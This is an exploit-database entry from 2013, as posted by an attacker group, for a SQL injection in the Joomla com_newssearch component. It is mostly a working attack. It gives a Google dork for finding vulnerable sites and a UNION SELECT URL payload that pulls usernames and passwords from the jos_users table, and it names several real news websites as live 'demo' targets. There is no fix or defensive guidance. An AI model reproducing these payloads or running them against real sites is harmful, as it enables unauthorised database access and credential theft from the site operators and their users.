Joomla Components com_newssearch SQL Injection Vulnerability

2013-07-03T00:00:00
ID 1337DAY-ID-20970
Type zdt
Reporter Cloudx
Modified 2013-07-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================================================
+++++++++++++++++
++ C L O U D X ++
+++++++++++++++++
================================================================================
########
# Exploit Title: Joomla Components com_newssearch SQL Injection Vulnerability
# Author: Cloudx
# Facebook Profile: www.fb.me/cloudmrx
# Web Site : www.tifa-team.com
# Category:: webapps
# Google Dork: inurl:"com_newssearch" & "cid="
# platform : php
# Vendor: None
# Download : Search Here > http://extensions.joomla.org/ <
# Version: All versions
# Security Risk : High
# Tested on: [Windows 8  64bit ]
########
 
========================

1)Vulnerability Description
2)Exploit
3)Real.Demo
 

1)Vulnerability Description
===========================
 
U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. 
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. 
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.
 
2)Exploit
=========
 
http://Localhost/{Path}/index.php?option=com_newssearch&type=list&section=1&cid=-1

Exploit .demo
=========
http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list&section=1&cid=-null+union+select+1,1,group_concat(username,0x3a,password)+from+jos_users--+Cloudx

[~] P0c [~] :
============
 
Vuln file in :
 
http://Localhost/{Path}/index.php?option=com_newssearch&type=list&section=1&cid=[Number]  <<-----|
 
[~] D3m0 [~] :
=============
 
http://www.ainsworthnews.com/index.php?option=com_newssearch&type=list&section=1&cid=25[Inj3ct Here]
http://www.hebronjournalregister.com/index.php?option=com_newssearch&type=list&section=1&cid=22[Inj3ct Here]
http://www.wpnews.com/index.php?option=com_newssearch&type=list&section=1&cid=28[Inj3ct Here]
 
 
Many Websites are Affected On SQL inJection
.
.
.
 
####
 
=================================**TIFA-Team**===============================================
# Greets To : 
	TIFA-Team & Palestine <3 & Syria <3 & Dr.Freedom & **All Muslims** 
		TIFA --> T = This , I = Is , F = For , A = Allah  
==============================================================================================

#  0day.today [2018-01-09]  #